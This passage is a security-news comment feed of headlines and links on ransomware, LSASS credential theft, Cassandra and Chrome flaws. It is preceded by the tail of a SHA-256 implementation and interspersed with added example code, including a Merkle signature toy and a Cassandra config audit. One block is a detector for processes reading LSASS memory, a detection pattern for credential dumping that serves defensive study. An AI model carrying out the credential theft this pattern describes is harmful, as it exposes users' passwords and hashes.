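    """One 64-byte block through the message schedule and 64 rounds."""
    w = list(struct.unpack(">16L", block))
    for i in range(16, 64):
        s0 = rotr(w[i - 15], 7) ^ rotr(w[i - 15], 18) ^ (w[i - 15] >> 3)
        s1 = rotr(w[i - 2], 17) ^ rotr(w[i - 2], 19) ^ (w[i - 2] >> 10)
        w.append((w[i - 16] + s0 + w[i - 7] + s1) & MASK)
    a, b, c, d, e, f, g, h = state
    for i in range(64):
        S1 = rotr(e, 6) ^ rotr(e, 11) ^ rotr(e, 25)
        ch = (e & f) ^ (~e & g)
        t1 = (h + S1 + ch + K[i] + w[i]) & MASK
        S0 = rotr(a, 2) ^ rotr(a, 13) ^ rotr(a, 22)
        maj = (a & b) ^ (a & c) ^ (b & c)
        t2 = (S0 + maj) & MASK
        h, g, f, e, d, c, b, a = g, f, e, (d + t1) & MASK, c, b, a, (t1 + t2) & MASK
    return [(s + v) & MASK for s, v in zip(state, (a, b, c, d, e, f, g, h))]


def sha256(msg: bytes) -> str:
    state = list(H0)
    padded = pad(msg)
    for off in range(0, len(padded), 64):
        state = compress(state, padded[off:off + 64])
    return struct.pack(">8L", *state).hex()


def self_check(lengths: Iterable[int] = (0, 3, 55, 56, 63, 64, 65, 1000)) -> bool:
    """True if this implementation agrees with hashlib on inputs around the padding boundaries."""
    return all(sha256(b"x" * n) == hashlib.sha256(b"x" * n).hexdigest() for n in lengths)


if __name__ == "__main__":
    print(sha256(b"abc"))
    print("matches hashlib:", self_check())
```

The lengths in `self_check` are chosen deliberately: 55 and 56 bytes are where padding flips from one block to two, and 63, 64 and 65 bytes exercise the block boundary, which is where hand-written padding code usually goes wrong.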
Tomi Engdahl says:
Feds Oppose Immediate Release of Voting Machine Report
https://www.securityweek.com/feds-oppose-immediate-release-voting-machine-report
A federal cybersecurity agency is reviewing a report that alleges security vulnerabilities in voting machines used by Georgia and other states and says the document shouldn’t be made public until the agency has had time to assess and mitigate potential risks.
The report has been under seal since July in federal court in Atlanta, part of a long-running lawsuit challenging Georgia’s voting machines. Its author, J. Alex Halderman, said in sworn declarations filed publicly with the court that he examined the Dominion Voting Systems machines for 12 weeks and identified “multiple severe security flaws” that would allow bad actors to install malicious software.
Plaintiffs in the case, who are election security advocates and individual voters, have for months called for the release of a redacted version of the report and urged that it be shared with state and federal election security officials. Lawyers for the state had repeatedly objected to those requests, but Secretary of State Brad Raffensperger last month put out a news release calling for its release.
Tomi Engdahl says:
Google Paid Out $8.7 Million in Bug Bounty Rewards in 2021
https://www.securityweek.com/google-paid-out-87-million-bug-bounty-rewards-2021
Tomi Engdahl says:
Lawmakers Introduce Combined Bill for Strengthening Critical Infrastructure Security
https://www.securityweek.com/lawmakers-introduce-combined-bill-strengthening-critical-infrastructure-security
U.S. senators Gary Peters (D-MI) and Rob Portman (R-OH) this week introduced a legislative package whose goal is to strengthen the cybersecurity of critical infrastructure and government networks.
The package, named Strengthening American Cybersecurity Act, combines three bills introduced in the fall of 2021: the Cyber Incident Reporting Act, the Federal Information Security Modernization Act of 2021, and the Federal Secure Cloud Improvement and Jobs Act.
If the bill becomes law, critical infrastructure owners and operators, as well as civilian federal agencies, will be required to inform the Cybersecurity and Infrastructure Security Agency (CISA) of any significant cyberattack within 72 hours.
Tomi Engdahl says:
The SASE Conversation in 2022, a Resolution for the Future
https://www.securityweek.com/sase-conversation-2022-resolution-future
Protecting Cryptocurrencies and NFTs – What’s Old is New
https://www.securityweek.com/protecting-cryptocurrencies-and-nfts-whats-old-new
Tomi Engdahl says:
Tripwire for Real War? Cyber’s Fuzzy Rules of Engagement
https://www.securityweek.com/tripwire-real-war-cybers-fuzzy-rules-engagement
If the West were to respond harshly to Russian aggression, Moscow could retaliate against NATO nations in cyberspace with an intensity and on a scale previously unseen
President Joe Biden couldn’t have been more blunt about the risks of cyberattacks spinning out of control. “If we end up in a war, a real shooting war with a major power, it’s going to be as a consequence of a cyber breach of great consequence,” he told his intelligence brain trust in July.
Now tensions are soaring over Ukraine with Western officials warning about the danger of Russia launching damaging cyberattacks against Ukraine’s NATO allies. While no one is suggesting that could lead to a full-blown war between nuclear-armed rivals, the risk of escalation is serious.
The danger is in the uncertainty about what crosses a digital red line. Cyberattacks, including those that cripple critical infrastructure with ransomware, have been on the rise for years and often go unpunished. It’s unclear how grave a malicious cyber operation by a state actor would have to be to cross the threshold to an act of war.
“The rules are fuzzy,” said Max Smeets, director of the European Cyber Conflict Research Initiative. “It’s not clear what is allowed, what isn’t allowed.”
Tomi Engdahl says:
15 NEW PROHIBITED GADGETS FROM ALIEXPRESS & AMAZON 2021 | FORBIDDEN PRODUCTS. TOOLS
https://www.youtube.com/watch?v=oRBj_AJiiRM
Tomi Engdahl says:
Hacking group framing targets for crimes.
A Hacker Group Has Been Framing People for Crimes They Didn’t Commit
https://gizmodo.com/a-hacker-group-has-been-framing-people-for-crimes-they-1848522497
A recent study shows the tactics and techniques of a cybercrime group that is known for planting incriminating evidence on the devices of activists in India.
For at least a decade, a shadowy hacker group has been targeting people throughout India, sometimes using its digital powers to plant fabricated evidence of criminal activity on their devices. That phony evidence has, in turn, often provided a pretext for the victims’ arrest.
ModifiedElephant APT and a Decade of Fabricating Evidence
https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/
Tomi Engdahl says:
FBI: BlackByte ransomware breached US critical infrastructure
https://www.bleepingcomputer.com/news/security/fbi-blackbyte-ransomware-breached-us-critical-infrastructure/
The US Federal Bureau of Investigation (FBI) revealed that the BlackByte ransomware group has breached the networks of at least three organizations from US critical infrastructure sectors in the last three months. This was disclosed in a TLP:WHITE joint cybersecurity advisory released Friday in coordination with the US Secret Service.
Source: https://www.ic3.gov/Media/News/2022/220211.pdf
Tomi Engdahl says:
74% of ransomware revenue goes to Russia-linked hackers
https://www.bbc.com/news/technology-60378009
New analysis suggests that 74% of all money made through ransomware attacks in 2021 went to Russia-linked hackers.
Tomi Engdahl says:
Over 28,000 Vulnerabilities Disclosed in 2021: Report
https://www.securityweek.com/over-28000-vulnerabilities-disclosed-2021-report
Risk Based Security on Monday released its vulnerability report for 2021 and revealed that a record-breaking 28,695 flaws were disclosed last year, which represents a significant increase from the 23,269 disclosed in 2020.
Of the vulnerabilities disclosed in 2021, more than 4,100 are remotely exploitable, have a public exploit available, and also have a patch or mitigation. By focusing on these security holes first, organizations could reduce risk by 86%, according to the vulnerability and data breach intelligence company.
On the other hand, to put that 4,100 into context, the known exploited vulnerabilities catalog maintained by CISA, which tracks issues disclosed over the past decade, only contains 360 entries.
The COVID-19 pandemic appears to have had some impact on vulnerability disclosures, starting with the first quarter of 2020, when there was a significantly lower number of disclosures. Risk Based Security (RBS) also noticed that disclosures slowed down in the first half of 2021, but they picked up in the second half of the year.
“In the 2021 Mid Year 2021 Report, the difference between 2020 and 2021 was only around 400. In the second half of the year, that gap then increased by over 3,500,” the company said in its latest report. “This is a considerable increase, further lending to the idea that we are seeing the disclosure landscape shake off the pandemic as researchers return to their normal output.”
Tomi Engdahl says:
A tool finds holes in open source code
https://etn.fi/index.php/13-news/13177-tyoekalu-loeytyy-aukot-avoimesta-laehdekoodista
EDA house Synopsys has launched Code Sight, a tool developed for finding and fixing security errors in code, as a standalone tool for integrated development environments (IDEs). With it, developers can quickly find and fix, for example, security flaws in source code and in open-source dependencies before the code is finalized.
Code Sight Standard Edition uses Synopsys's Rapid Scan Static and Rapid Scan SCA technology. In practice it is an application that performs a fast security analysis of the code directly in the developer's own IDE environment. This avoids the costly rework caused by problems discovered later in the software development life cycle.
By giving developers the ability to fix security flaws while coding, Code Sight Standard Edition reduces the load on later-stage security testing and minimizes expensive fixes needed to resolve problems after developers have moved on to other projects.
Tomi Engdahl says:
‘Don’t Be Google’: The Rise of Privacy Focused Startups
https://www.securityweek.com/dont-be-google-rise-privacy-focused-startups
Google once used the slogan “don’t be evil” to distinguish itself from its competitors, but now a growing number of pro-privacy startups are rallying to the mantra “don’t be Google”.
They are taking on Google Analytics, a product used by more than half of the world’s websites to understand people’s browsing habits.
“Google made a lot of good tools for a lot of people,” says Marko Saric, a Dane living in Belgium who set up Plausible Analytics in Estonia in 2019.
“But over the years they changed their approach without really thinking what is right, what is wrong, what is evil, what is not.”
Saric and many others are benefitting from GDPR, a European privacy regulation introduced in 2018 to control who can access personal data.
Last week, France followed Austria in declaring Google’s practice of transferring personal data from the EU to its US servers was illegal under GDPR because the country does not have adequate protections.
Google disagrees, saying the data is anonymised and the scenarios envisaged in Europe are hypothetical.
Nevertheless, startups see an opening in a true David vs Goliath battle.
“The week that Google Analytics was ruled illegal by the Austrian DPA (data protection authority) was a good week for us,” says Paul Jarvis, who runs Fathom Analytics from his home in Vancouver Island, Canada.
Tomi Engdahl says:
The first security chip that withstands quantum computer attacks
https://etn.fi/index.php/13-news/13180-ensimmaeinen-kvanttikonehyoekkaeykset-kestaevae-turvasiru
Computers have long used TPM security modules, in which data sensitive to the device and the user, along with its keys, is stored. Infineon has now taken TPM protection a long step further.
The company has introduced a new OPTIGA module. The SLB 9672 module is equipped with a future-proof security solution with quantum-level encryption. In addition, the firmware update mechanism uses 256-bit XMSS signatures.
This mechanism counters the threat of firmware corruption by attackers who gain access to quantum computers, and it increases the device's long-term resilience by enabling a quantum-resistant firmware update path. The standardized, ready-to-use TPM provides a solid foundation for securely establishing the identity and software state of PCs, servers and connected devices, and for protecting the integrity and confidentiality of data at rest and in transit.
Infineon's latest addition to the OPTIGA TPM family is the industry's first TPM to offer a firmware update mechanism with a 256-bit key length together with an additional PQC-based check. With this strong and reliable update mechanism, the OPTIGA TPM SLB 9672 can still be updated if the standard algorithms are no longer trusted.
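The XMSS firmware signatures mentioned above belong to the family of stateful hash-based signatures, whose security rests only on the preimage resistance of a hash function rather than on factoring or discrete logarithms. The following added example (not Infineon's code, and not XMSS itself, which uses WOTS+ chains and additional domain separation) shows the underlying construction: Lamport one-time keys under a Merkle tree, with the signer tracking which leaf has been used so that no one-time key signs twice. The firmware image bytes and tree height are constructed for the demonstration.

```python
"""Toy stateful hash-based signature: Lamport one-time keys under a Merkle tree.

Added example illustrating the structure behind schemes such as XMSS; it is not
XMSS and not any vendor's firmware-update code. Only SHA-256 is used, so an
attacker must find hash preimages to forge, which is why this family is
considered quantum-resistant.
"""
import hashlib
import os


def H(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


N = 32  # bytes per hash output / secret value


def lamport_keygen():
    """256 bit positions, each with two random preimages; public key is their hashes."""
    sk = [[os.urandom(N), os.urandom(N)] for _ in range(256)]
    pk = [[H(sk[i][0]), H(sk[i][1])] for i in range(256)]
    return sk, pk


def pk_leaf(pk) -> bytes:
    """Compress a Lamport public key into one Merkle leaf."""
    return H(b"".join(p[0] + p[1] for p in pk))


def lamport_sign(sk, digest: bytes):
    bits = int.from_bytes(digest, "big")
    return [sk[i][(bits >> (255 - i)) & 1] for i in range(256)]


def lamport_verify(pk, digest: bytes, sig) -> bool:
    bits = int.from_bytes(digest, "big")
    return all(H(sig[i]) == pk[i][(bits >> (255 - i)) & 1] for i in range(256))


class MerkleSigner:
    """Holds 2**height one-time keys and a counter (the 'state') of the next unused leaf."""

    def __init__(self, height: int = 3):
        self.leaves_count = 1 << height
        self.sks, self.pks = zip(*[lamport_keygen() for _ in range(self.leaves_count)])
        # levels[0] = leaves, levels[-1] = [root]
        self.levels = [[pk_leaf(pk) for pk in self.pks]]
        while len(self.levels[-1]) > 1:
            prev = self.levels[-1]
            self.levels.append([H(prev[i] + prev[i + 1]) for i in range(0, len(prev), 2)])
        self.root = self.levels[-1][0]   # the only value a verifier (e.g. a TPM) must trust
        self.next_index = 0

    def sign(self, message: bytes):
        if self.next_index >= self.leaves_count:
            raise RuntimeError("all one-time keys used; a new tree is required")
        idx = self.next_index
        self.next_index += 1            # advance state before releasing the signature
        digest = H(message)
        ots = lamport_sign(self.sks[idx], digest)
        auth, node = [], idx
        for level in self.levels[:-1]:  # sibling on each level forms the authentication path
            auth.append(level[node ^ 1])
            node >>= 1
        return {"index": idx, "ots": ots, "pk": self.pks[idx], "auth": auth}


def merkle_verify(root: bytes, message: bytes, sig) -> bool:
    """Check the one-time signature, then recompute the root from the leaf and auth path."""
    digest = H(message)
    if not lamport_verify(sig["pk"], digest, sig["ots"]):
        return False
    node, idx = pk_leaf(sig["pk"]), sig["index"]
    for sibling in sig["auth"]:
        node = H(node + sibling) if idx % 2 == 0 else H(sibling + node)
        idx >>= 1
    return node == root


if __name__ == "__main__":
    signer = MerkleSigner(height=3)
    firmware = b"constructed firmware image v1.2"   # constructed sample payload
    signature = signer.sign(firmware)
    print("valid:", merkle_verify(signer.root, firmware, signature))
    print("tampered valid:", merkle_verify(signer.root, firmware + b"!", signature))
```

The practical lesson is the state: the signer must persist `next_index` reliably, because reusing a Lamport leaf reveals enough preimages for forgery. That is the operational burden XMSS carries and the reason a fixed-function firmware verifier, which only needs the root, is a natural fit for it.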
Tomi Engdahl says:
Google Cuts User Account Compromises in Half With Simple Change
The online tech giant auto-enabled two-step verification for more than 150 million users, throwing up steep hurdles against scammers and attackers.
https://www.darkreading.com/attacks-breaches/google-cuts-account-compromises-in-half-with-simple-change
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-will-soon-block-windows-password-theft/
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/fake-windows-11-upgrade-installers-infect-you-with-redline-malware/
Tomi Engdahl says:
https://www.darkreading.com/vulnerabilities-threats/google-paid-record-8-7-million-to-bug-hunters-in-2021
Tomi Engdahl says:
Microsoft Defender will soon block Windows password theft
https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-will-soon-block-windows-password-theft/
Microsoft is enabling a Microsoft Defender ‘Attack Surface Reduction’ security rule by default to block hackers’ attempts to steal Windows credentials from the LSASS process.
When threat actors compromise a network, they attempt to spread laterally to other devices by stealing credentials or using exploits.
One of the most common methods to steal Windows credentials is to gain admin privileges on a compromised device and then dump the memory of the Local Security Authority Server Service (LSASS) process running in Windows.
This memory dump contains NTLM hashes of Windows credentials of users who had logged into the computer that can be brute-forced for clear-text passwords or used in Pass-the-Hash attacks to login into other devices.
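From the defender's side, LSASS memory reads are also a high-value detection signal: Sysmon Event ID 10 (ProcessAccess) records which process opened a handle to lsass.exe, with what access mask, and from which call stack. The added example below (not code from the article or from Microsoft) flags such events when the source is outside an allowlist and the granted access includes PROCESS_VM_READ; the allowlist, field names and JSON event records are constructed for the demonstration and must be tuned to a real environment.

```python
"""Flag suspicious handle opens against lsass.exe in Sysmon-style ProcessAccess events.

Added example, not code from BleepingComputer or Microsoft. The sample records are
constructed and use the field names of Sysmon Event ID 10 (SourceImage, TargetImage,
GrantedAccess, CallTrace).
"""
import json

# Process access rights (winnt.h). Credential dumpers typically request
# PROCESS_VM_READ | PROCESS_QUERY_LIMITED_INFORMATION (0x1010) or PROCESS_ALL_ACCESS.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS = 0x1FFFFF

# Assumed allowlist of processes that legitimately touch LSASS; tune per environment.
BENIGN_SOURCES = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

# Constructed sample events, one JSON object per line.
SAMPLE_EVENTS = r"""
{"EventID":10,"SourceImage":"C:\\Windows\\System32\\csrss.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe","GrantedAccess":"0x1FFFFF","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+9d1f4"}
{"EventID":10,"SourceImage":"C:\\Users\\alice\\Downloads\\updater.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe","GrantedAccess":"0x1010","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+9d1f4|UNKNOWN(00007FF6A1B2C3D4)"}
{"EventID":10,"SourceImage":"C:\\Windows\\System32\\taskmgr.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+9d1f4"}
{"EventID":1,"Image":"C:\\Windows\\System32\\notepad.exe"}
"""


def parse_events(text: str):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def find_lsass_access(text: str):
    """Return one finding per event that reads LSASS memory from a non-allowlisted process."""
    findings = []
    for ev in parse_events(text):
        if ev.get("EventID") != 10:
            continue
        if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            continue
        source = ev.get("SourceImage", "")
        if source.lower() in BENIGN_SOURCES:
            continue
        access = int(ev.get("GrantedAccess", "0x0"), 16)
        reasons = []
        if access & PROCESS_VM_READ:            # PROCESS_ALL_ACCESS sets this bit too
            reasons.append("PROCESS_VM_READ")
        if "UNKNOWN" in ev.get("CallTrace", ""):  # call from memory not backed by a module
            reasons.append("unbacked call stack")
        if reasons:
            findings.append({"source": source, "access": hex(access), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in find_lsass_access(SAMPLE_EVENTS):
        print(hit)
```

The third sample event (taskmgr.exe with 0x1000) is deliberately not flagged: query-only access cannot read the process memory that holds the hashes, so alerting on any handle to LSASS would drown the signal in noise. The Attack Surface Reduction rule the article describes is the preventive counterpart to this detection.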
Tomi Engdahl says:
Backup Plays Key Role in Ransomware Response, But Not a Complete Solution
https://www.securityweek.com/backup-plays-key-role-ransomware-response-not-complete-solution
Ransomware attacks have increased in volume, sophistication and ransom demanded consistently over the last few years. According to published records, the education and retail industries are the most targeted.
The energy, oil and gas industries and local government are the most likely to pay a ransom demand, while manufacturing and production are the most able – with local government and healthcare the least able – to restore systems from backup.
These details were published in risk management firm CyberSaint’s State of Ransomware Attacks Report 2022 (PDF). CyberSaint’s co-founder and CPO Padraic O’Reilly adds the proviso that there is an inherent and unavoidable bias in this method of data collection: the figures do not and cannot account for those victims that quietly pay the ransom without reporting the compromise.
There was a recent flurry of optimism following the Russian authorities’ arrest of REvil members in January 2022. The hope was for a decline in ransomware activity associated with a rise in international law enforcement cooperation. While there are some factors driving success in the fight against data extortion attacks, the threat still lurks. O’Reilly told SecurityWeek that he is hopeful for an improvement, but doesn’t necessarily expect one.
On February 9, 2022, CISA, the FBI, the NSA, Australia’s ACSC and the UK’s NCSC published a joint cybersecurity alert warning about trends showing an increased globalized threat of ransomware. It warned that “if the ransomware criminal business model continues to yield financial returns for ransomware actors, ransomware incidents will become more frequent.”
Tomi Engdahl says:
Stopping to learn equates to ceasing your success when it comes to cybersecurity certifications. Read more to upgrade your salary level.
https://cybersecuritymate.com/cybersecurity-certifications-path/?fbclid=IwAR02DY4ndRszRmNk8wLwXnYJEgmJJJ84ft-maAVb9Uqh4PL7SDJJZ58nY44
Tomi Engdahl says:
Researcher ‘reverses’ redaction, extracts words from pixelated image
https://www.bleepingcomputer.com/news/security/researcher-reverses-redaction-extracts-words-from-pixelated-image/
A researcher has demonstrated how he was able to successfully recover text that had been redacted using the pixelation technique. Further, the researcher has released a GitHub tool that can be used by anyone to reconstruct text from obscure, pixelated images.
Tomi Engdahl says:
Corin Faife / The Verge:
CISA, FBI, and NSA say Russian state-sponsored hackers targeted US defense contractors for at least two years, acquiring export-controlled technology and more — The state-sponsored actors acquired information on weapons, aircraft design, and combat communications systems over a period of years
Russian hackers have obtained sensitive defense information technology by targeting US contractors, according to CISA
https://www.theverge.com/2022/2/16/22937554/russian-hackers-target-us-defense-contractors-nsa-cisa?scrolla=5eb6d68b7fedc32c19ef33b4
Russian state-sponsored hackers have been targeting security-cleared US defense contractors for at least two years, according to an alert released Wednesday by the Cybersecurity and Infrastructure Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA).
According to the alert, Russian-backed actors had targeted cleared defense contractors (CDCs) and subcontractors that supported the Department of Defense (DoD) in a range of areas, including weapons and missile development, vehicle and aircraft design, surveillance and reconnaissance, and combat communications systems. Compromised entities include contractors supporting the US Army, Air Force, Navy, Space Force, DoD, and Intelligence programs.
Though there is no mention of classified documents being stolen, details suggest that the nature of the information gives a significant understanding of US military operations.
“The acquired information provides significant insight into U.S. weapons platforms development and deployment timelines, vehicle specifications, and plans for communications infrastructure and information technology,” the text of the alert said. “By acquiring proprietary internal documents and email communications, adversaries may be able to adjust their own military plans and priorities, hasten technological development efforts, inform foreign policymakers of U.S. intentions, and target potential sources for recruitment.”
Given the success of current efforts, the FBI, NSA, and CISA anticipate that Russian state-sponsored cyber actors will continue to target defense contractors for information in the near future.
Tomi Engdahl says:
This journalist’s Otter.ai scare is a reminder that cloud transcription isn’t completely private
A reminder of the tradeoffs for ease and simplicity
https://www.theverge.com/2022/2/16/22937766/go-read-this-otter-ai-transcription-data-privacy-report
A report recently published by Politico about the automated transcription service Otter.ai serves as a great reminder of how difficult it can be to keep things truly private in the age of cloud-based services. It starts off with a nerve-wracking story — the journalist interviewed Mustafa Aksu, a Uyghur human rights activist who could be a target of surveillance from the Chinese government. But though they took pains to keep their communication confidential, they used Otter to record the call — and a day later, they received a message from Otter asking about the purpose of the conversation with Aksu.
Obviously, it was a concerning email. After receiving mixed messages from an Otter support agent about whether the survey was real or not, the reporter went down a rabbit hole trying to figure out what had happened. He details his dive into the service’s privacy policy (which does let Otter share some info with third parties), and lays out how the ease and utility of transcription software can override critical thinking about where potentially sensitive data is ending up.
My journey down the rabbit hole of every journalist’s favorite app
Otter.ai has saved reporters countless hours transcribing interviews. Caveat emptor.
https://www.politico.com/news/2022/02/16/my-journey-down-the-rabbit-hole-of-every-journalists-favorite-app-00009216
Tomi Engdahl says:
https://www.securityweek.com/cambodia-delays-controversial-internet-gateway
Tomi Engdahl says:
Ransomware-Related Data Leaks Nearly Doubled in 2021: Report
https://www.securityweek.com/ransomware-related-data-leaks-nearly-doubled-2021-report
There was a significant increase in ransomware-related data leaks and interactive intrusions in 2021, according to the 2022 Global Threat Report released on Tuesday by endpoint security firm CrowdStrike.
The number of ransomware attacks that led to data leaks increased from 1,474 in 2020 to 2,686 in 2021, which represents an 82% increase. The sectors most impacted by data leaks in 2021 were industrial and engineering, manufacturing, and technology.
“The growth and impact of [big game hunting] in 2021 was a palpable force felt across all sectors and in nearly every region of the world. Although some adversaries and ransomware ceased operations in 2021, the overall number of operating ransomware families increased,” CrowdStrike said in its report.
Tomi Engdahl says:
Mexican Businessman Pleads Guilty in U.S. to Brokering Hacking Tools
https://www.securityweek.com/mexican-businessman-pleads-guilty-us-brokering-hacking-tools
A Mexican businessman has admitted in a United States federal court to conspiring to sell and use interception devices and hacking services from companies in Italy, Israel, and elsewhere.
The man, Carlos Guerrero, of Chula Vista, California, and Tijuana, Mexico, owned and operated multiple companies in the U.S. and Mexico.
Between 2014 and 2015, he brokered hacking devices and geolocation tools from an Italian company, and later tools and services from Israeli and other companies.
While the spyware vendors have not been named, they are likely Italy’s now-defunct Hacking Team and Israel’s NSO Group.
“In 2016 and 2017, for example, Guerrero marketed signal jammers, Wi-Fi interception tools, IMSI catchers, and the ability to hack WhatsApp messages to prospective clients in the U.S. and Mexico,” the U.S. Department of Justice says.
Tomi Engdahl says:
CoinDesk:
Canadian authorities have ordered regulated financial firms to cease transactions from 34 crypto wallets, worth over $870K, tied to funding the “Freedom Convoy” — Bitcoin, Ethereum, Litecoin, Monero and Cardano addresses are all on the list. — The Ontario Provincial Police …
Canada Sanctions 34 Crypto Wallets Tied to Trucker ‘Freedom Convoy’
https://www.coindesk.com/policy/2022/02/16/canada-sanctions-34-crypto-wallets-tied-to-trucker-freedom-convoy/
Tomi Engdahl says:
Solving the Quantum Decryption ‘Harvest Now, Decrypt Later’ Problem
https://www.securityweek.com/solving-quantum-decryption-harvest-now-decrypt-later-problem
There are two important problems for encryption: the keys and their distribution. Distribution is generally done via asymmetric encryption – but the distribution can be intercepted, and the asymmetric encryption cracked.
This problem exists today, but the cracking problem will get many times worse with the expected arrival of quantum computers and their vastly superior processing capabilities. Asymmetric encryption will be the first to fall – Shor’s quantum algorithm is proven to work. This has led to the new attacker concept of ‘harvest now, decrypt later’.
Quantum resiliency firm Qrypt has now released a product, Qrypt Key Generation, designed to take asymmetric encryption out of the equation by eliminating the need for traditional key distribution.
https://www.qrypt.com/
Tomi Engdahl says:
High-Severity Vulnerability Found in Apache Database System Used by Major Firms
https://www.securityweek.com/high-severity-vulnerability-found-apache-database-system-used-major-firms
Researchers detail code execution vulnerability in Apache Cassandra
JFrog’s security researchers on Tuesday published full technical details on a high-severity remote code execution vulnerability addressed in the latest version of Apache Cassandra.
A distributed NoSQL database that offers high scalability, Cassandra is popular among organizations such as Netflix, Reddit, Twitter, Cisco, Constant Contact, Digg, Urban Airship, OpenX, and more, as well as among cloud-native and DevOps development circles.
Tracked as CVE-2021-44521 (CVSS score of 8.4), the newly patched vulnerability only affects non-default configurations of the database – which mitigates the fact that it is easy to exploit – leading to complete system compromise.
The security error only exists if functionality to create user-defined-functions (UDFs) for custom processing of data is enabled in Cassandra, and can be exploited only if the attacker has enough permissions to create UDFs. The configuration is non-default and it has been documented as unsafe.
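Since the article's point is that exposure depends on a non-default configuration, the practical check is an audit of cassandra.yaml. The added example below (not JFrog's or the Apache Cassandra project's code) scans a config for the UDF switches; it assumes the Cassandra 3.x/4.0 key names `enable_user_defined_functions` and `enable_scripted_user_defined_functions`, and the two sample configs are constructed, one safe and one with UDFs switched on.

```python
"""Audit cassandra.yaml for user-defined-function switches that the page calls non-default and unsafe.

Added example, not JFrog's or Apache Cassandra's code. Key names are the Cassandra 3.x/4.0
cassandra.yaml switches (assumed); the sample configs are constructed.
"""
import re

UDF_KEYS = {
    "enable_user_defined_functions": "users with CREATE permission can define UDFs",
    "enable_scripted_user_defined_functions": "UDFs may be written in JavaScript as well as Java",
}

# Constructed: the shipped default, both switches off.
SAFE_CONFIG = """
cluster_name: 'Test Cluster'
enable_user_defined_functions: false
enable_scripted_user_defined_functions: false
"""

# Constructed: switches turned on for a reporting workload and never reviewed.
RISKY_CONFIG = """
cluster_name: 'Test Cluster'
# enable_user_defined_functions was turned on for the reporting team
enable_user_defined_functions: true
enable_scripted_user_defined_functions: True
"""


def parse_flags(yaml_text: str) -> dict:
    """Line-based parse of the top-level boolean keys we care about (ignores comments)."""
    flags = {}
    for line in yaml_text.splitlines():
        m = re.match(r"^\s*([A-Za-z_]+)\s*:\s*(\S+)", line)
        if m and m.group(1) in UDF_KEYS:
            flags[m.group(1)] = m.group(2).strip("'\"").lower() == "true"
    return flags


def audit(yaml_text: str) -> list:
    """Return one finding string per UDF switch that is enabled; empty list means default posture."""
    flags = parse_flags(yaml_text)
    return [f"{key}: true ({why})" for key, why in UDF_KEYS.items() if flags.get(key, False)]


if __name__ == "__main__":
    print("safe  :", audit(SAFE_CONFIG))
    print("risky :", audit(RISKY_CONFIG))
```

A missing key counts as disabled, matching the shipped defaults, so the audit reports only explicit opt-ins; where UDFs are genuinely needed, the article's other precondition, who holds permission to create them, is the second thing to review.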
Tomi Engdahl says:
CISA Urges Organizations to Patch Recent Chrome, Magento Zero-Days
https://www.securityweek.com/cisa-urges-organizations-patch-recent-chrome-magento-zero-days
The United States Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday announced that it has expanded its Known Exploited Vulnerabilities Catalog with nine more security flaws, including two recently addressed zero-days.
One of these is CVE-2022-24086, a critical-severity (CVSS score 9.8) vulnerability in Adobe Commerce and Magento. Described as an improper input validation bug, the security hole can be exploited to achieve remote code execution, without authentication.
On Sunday, Adobe released an emergency advisory to warn that it had observed very limited attacks targeting CVE-2022-24086.
The second zero-day vulnerability is CVE-2022-0609, a high-severity security defect in the Chrome browser that Google describes as a use-after-free issue in Animation, and which could also lead to code execution attacks.
On Monday, the Internet giant announced that it was aware of the existence of an exploit targeting CVE-2022-0609, but did not provide further information on observed attacks.
Tomi Engdahl says:
COVID’s Silver Lining: The Acceleration of the Extended IoT
https://www.securityweek.com/covid%E2%80%99s-silver-lining-acceleration-extended-iot
Acceleration of XIoT unlocked business opportunities and ignited security innovation
Most experts agree that over the past two years, COVID has accelerated digital transformation significantly – by five to 10 years – as has the convergence of physical and digital assets. Ransomware attacks against hospitals, oil pipelines, food supply chains, and other critical infrastructure brought into sharp focus the high criticality of cyber-physical systems (CPS) and their exposure to attacks. With more time, the security industry would have been better prepared to address the cyber risks of converged CPS. However, I’d like to argue that this acceleration and the functions it forced are the silver lining of the COVID pandemic. Here’s why.
Let’s start with defining what we mean by CPS. NIST defines CPS as “comprising interacting digital, analog, physical, and human components engineered for function through integrated physics and logic.” Other phrases include IoT, Industrial Internet, Smart Cities, Smart Grid and “Smart” Anything (e.g., cars, buildings, homes, manufacturing, hospitals, appliances).
For simplicity, these categories can be referred to holistically as the Extended IoT (XIoT), with three main components:
1. Industrial IoT (IIoT) and operational technology (OT) are all the cyber-physical processes and equipment such as programmable logic controllers (PLCs) that support critical processes in industrial environments. These systems are connected internally to workstations that can typically be accessed remotely for maintenance; other cyber components include IIoT devices such as smart sensors. The 16 critical infrastructure sectors as defined by CISA – from manufacturing to energy to transportation – rely on these interconnected processes and systems.
2. Healthcare IoT includes medical imaging equipment such as MRI machines and CT scanners, as well as internet of medical things (IoMT) devices such as smart vitals monitors and infusion pumps that support critical care delivery in healthcare environments. These systems are usually connected to organizations’ IT networks.
3. All other IoT devices used in smart cities, smart grids, Enterprise IoT, and smart “anything.”
Acceleration of the XIoT was net positive for a few reasons, as it:
• Unlocked business opportunities.
• Ignited security innovation.
• Prioritized cybersecurity at the board level.
• Raised executive awareness of XIoT.
